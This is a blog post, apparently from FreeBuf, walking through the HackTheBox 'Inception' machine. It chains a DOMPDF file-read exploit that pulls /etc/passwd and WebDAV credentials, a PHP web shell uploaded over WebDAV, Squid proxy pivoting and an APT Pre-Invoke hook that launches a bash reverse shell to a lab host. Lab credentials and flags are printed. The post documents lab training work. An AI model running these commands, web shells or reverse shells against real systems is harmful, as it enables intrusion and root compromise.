freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升
maptnh 2025-03-27 22:03:05 4824
所属地 海外

Information Gathering

IP AddressOpening Ports
10.10.10.67TCP:80,3128

$ ip='10.10.10.67'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved

DOM-PDF LFI

http://10.10.10.67/

image.png

http://10.10.10.67:3128/

image-14.png

$ feroxbuster -u 'http://10.10.10.67/'

image-1.png

http://10.10.10.67/dompdf/README.md

image-2.png

http://10.10.10.67/dompdf/VERSION

image-3.png

https://www.exploit-db.com/exploits/33004

$ curl 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd'

image-4.png

$ curl -s 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf' |grep -oE '[A-Za-z0-9+/=]{20,}' | tr -d '\n' | base64 -d

image-5.png

$ curl -s 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd' |grep -oE '[A-Za-z0-9+/=]{20,}' | tr -d '\n' | base64 -d

image-6.png

image-7.png

username:webdav_tester
password:babygurl69

davtest && Webshell

Web 分布式创作和版本控制 (WebDAV) 是一种 HTTP 扩展,旨在允许人们使用 HTTP 创建和修改网站。它最初始于 1996 年。

image-8.png

$ davtest -url http://10.10.10.67/webdav_test_inception -auth webdav_tester:babygurl69

image-9.png

$ echo '<?php system($_GET[cmd]); ?>' > rev.php

$ curl -X PUT http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/rev.php -d @rev.php

image-10.png

#!/bin/bash

URL='http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/rev.php?cmd='

while true; do
    read -p "webdav-shell> " cmd
    if [[ "$cmd" == "exit" ]]; then
        echo "[+] Exiting shell..."
        break
    fi
    encoded_cmd=$(echo -n "$cmd" | jq -sRr @uri)
    curl -s "${URL}${encoded_cmd}"
    echo
done

image-11.png

www-data -> cobb : Squid Unauthorized access

webdav-shell> cat /var/www/html/wordpress_4.8.3/wp-config.php

image-12.png

username:root
password:VwPddNh7xMZyDQoByQL4

image-13.png

image-15.png

$ proxychains -f ./proxychains.conf ssh cobb@127.0.0.1

image-16.png

User.txt

a5b6db2fa5bfe8a677c41ec3b01b2ba6

Privilege Escalation:FTP + TFTP && Apt Pre-Invoke Script

image-17.png

$ sudo su

$ proxychains -f ./proxychains.conf ssh -D 1080 cobb@127.0.0.1

$ proxychains -f ./proxychains1080.conf scp pspy64 cobb@127.0.0.1:/tmp/pspy64

$ proxychains -f ./proxychains1080.conf scp linpeas.sh cobb@127.0.0.1:/tmp/linpeas.sh

扫描C端

$ nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused

Connection to 192.168.0.1 21 port [tcp/ftp] succeeded!
Connection to 192.168.0.1 22 port [tcp/ssh] succeeded!
Connection to 192.168.0.1 53 port [tcp/domain] succeeded!

$ ftp 192.168.0.1

在ftp内无法上传文件。通过读取宿主机的cron任务得知每五分钟会运行一次apt update命令

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 *   * * *   root    apt update 2>&1 >/var/log/apt/custom.log
30 23   * * *   root    apt upgrade -y 2>&1 >/dev/null

image-18.png

$ tftp 192.168.0.1

tftp> put /tmp/exp /tmp/exp

可以通过tftp上传文件

image-19.png

靶机宿主:

00exp内容

APT::Update::Pre-Invoke {"/bin/bash /tmp/rev.sh"}

/tmp/rev.sh

#!/bin/bash

bash -i >& /dev/tcp/192.168.0.10/9911 0>&1

$ tftp 192.168.0.1

tftp> put /tmp/00exp /etc/apt/apt.conf.d/00exp
tftp> put /tmp/rev.sh /tmp/rev.sh

$ nc -lvnp 9911

image-20.png

靶机容器:

$ nc -lvnp 9911

image-21.png

root.txt

d208effa777aa4489c26d2772723190c

# web安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 342 文章数
  • 63 关注者
[CISSP] [7] PKI和密码应用
2025-04-03
[CISSP] [6] 密码学和对称密钥算法
2025-04-03
[CISSP] [5] 保护资产安全
2025-04-02
文章目录